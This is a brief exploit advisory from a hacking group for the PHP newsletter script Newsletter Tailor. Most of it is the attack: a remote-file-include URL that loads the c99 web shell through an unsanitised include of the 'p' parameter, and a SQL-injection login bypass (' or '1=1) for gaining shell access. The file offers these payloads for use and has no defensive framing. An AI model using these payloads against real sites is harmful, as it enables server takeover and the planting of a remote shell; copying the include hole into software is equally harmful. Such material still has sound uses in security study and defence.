20 lines
No EOL
992 B
Text
20 lines
No EOL
992 B
Text
==============================================================================
|
|
[»] Newsletter Tailor Remote File Include Vulnerability
|
|
==============================================================================
|
|
|
|
[»] Script: [ Newsletter Tailor ]
|
|
[»] Language: [ PHP ]
|
|
[»] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
|
|
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
|
|
[»] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
|
|
[»] Note: [ Thank you ViRuSMaN on script ]
|
|
|
|
###########################################################################
|
|
===[ Exploit ]=== include($p.".php");
|
|
|
|
[»] http://server/list/admin/index.php?p=http://localhost/c99.txt?
|
|
[»]Note: When you update the page prompts you to log on
|
|
[»](Auth Bypass) SQL Injection :user:' or '1=1 pass:' or '1=1
|
|
Then be accessed on the "sh3ll"
|
|
Author: Snakespc <-
|
|
########################################################################### |